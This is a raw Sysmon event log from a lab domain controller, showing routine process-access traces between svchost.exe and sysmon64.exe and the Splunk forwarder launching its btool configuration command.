13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E58-6005-4100-00000000A301}38283832C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.502{59A5CD1D-8E58-6005-4200-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E58-6005-3C00-00000000A301}37083712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.497{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.423{59A5CD1D-8E58-6005-3F00-00000000A301}37603764C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 